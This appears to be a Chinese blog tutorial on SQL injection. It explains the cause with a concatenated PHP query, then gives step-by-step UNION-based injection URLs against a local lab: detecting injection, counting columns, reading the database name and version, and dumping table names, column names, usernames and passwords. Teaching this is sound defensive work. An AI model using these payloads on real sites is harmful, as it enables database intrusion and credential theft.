网站渗透见解

简介: SQL注入漏洞主要形成的原因是在数据交互中,前端的 数据传入到后台处理时,没有做严格的判断,导致其传入的 “数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。

## 前言

       今天来分享一些网站搭建中经常出现的漏洞解析,我们在

   网站搭建中经常会遇到一些网站报错的小问题,不要小看这些

   小问题,有可能会直接使我们的程序崩溃,造成不可逆的损失

   数据损坏。而有一些不法分子会利用我们网站的漏洞进行攻击

   与数据盗取,希望大家注意,今天就分享一下自己对网站搭建

   与安全的一些见解。

       SQL注入漏洞主要形成的原因是在数据交互中,前端的

   数据传入到后台处理时,没有做严格的判断,导致其传入的

   “数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。

   从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。

   PHP代码:$sql="SELECT user_name FROM users WHERE id='$id' LIMIT 0,1";

   地址:http://127.0.0.1/index.php?id=1

   此时的数据库语句:

   select user_name from users where id=‘1’

   1、 判断注入

  http://127.0.0.1/index.php?id=1 and 1=1  //页面反馈正常

  http://127.0.0.1/index.php?id=1 and 1=2  //页面显示报错

   2、 判断字段数

  http://127.0.0.1/index.php?id=1 order by 1

  http://127.0.0.1/index.php?id=1 order by 2

  http://127.0.0.1/index.php?id=1 order by 3

  http://127.0.0.1/index.php?id=1 order by 4 //页面进行报错,存在三个字段数

   3、 查库

  http://127.0.0.1/index.php?id=-1 union select 1,2,3

  http://127.0.0.1/index.php?id=-1 union select 1,2,database() //库名

   数据库版本:version()

   数据库名字:database()

   数据库用户:user()

   操作系统:@@version_compile_os.

    http://127.0.0.1/index.php?id=-1 union select  

   1,2,group_concat(table_name) from information_sch

   ema.tables where table_schema=database()

    http://127.0.0.1/index.php?id=-1 union select

   1,2,group_concat(column_name) from information_sche

   ma.columns where table_name='users'

    http://127.0.0.1/Less-2/?id=-1 union select  

   1,2,group_concat(username) from security.users

    http://127.0.0.1/index.php?id=-1?id=-1 union

   select 1,2,group_concat(password) from security.users

目录
相关文章
|
8月前
|
安全 网络协议 网络安全
网安面试指南——(渗透,攻击,防御)
网安面试指南——(渗透,攻击,防御)
179 2
|
8月前
|
SQL 运维 安全
黑客(网络安全)技术自学——高效学习
黑客(网络安全)技术自学——高效学习
90 1
|
5月前
|
云安全 安全 Linux
钓鱼特辑(二)在红队眼皮底下拆解木马
一场牵动人心的攻防演练正在如火如荼地开展,红方每天变着花样对目标进行钓鱼攻击,亿格云枢EDR也捕获到诸多木马样本:如XX市场业务部招聘jd&福利“、个人简历docx.rar、VX截图_20240731.exe 、图片文件-XXX公司相关问题咨询20240730.zip....
|
7月前
|
机器学习/深度学习 人工智能 安全
网络安全专家指出恶意AI将开始泛滥
网络安全专家指出恶意AI将开始泛滥
|
8月前
|
安全 应用服务中间件 PHP
黑客渗透知识点总结
黑客渗透知识点总结
|
8月前
|
安全 网络安全 区块链
网络安全的行业黑话 ——攻击篇 之攻击工具
网络安全的行业黑话 ——攻击篇 之攻击工具
81 0
|
数据采集 安全 网络协议
探寻渗透测试之道:信息收集在网络安全中的重要性
探寻渗透测试之道:信息收集在网络安全中的重要性
302 0
|
JSON 安全 关系型数据库
实战 | 记一次曲折的钓鱼溯源反制2
实战 | 记一次曲折的钓鱼溯源反制
171 0
|
SQL 前端开发 Linux
实战 | 记一次曲折的钓鱼溯源反制1
实战 | 记一次曲折的钓鱼溯源反制
107 0
|
中间件 关系型数据库 MySQL
高难度渗透测试场景靶场
高难度渗透测试场景靶场
149 0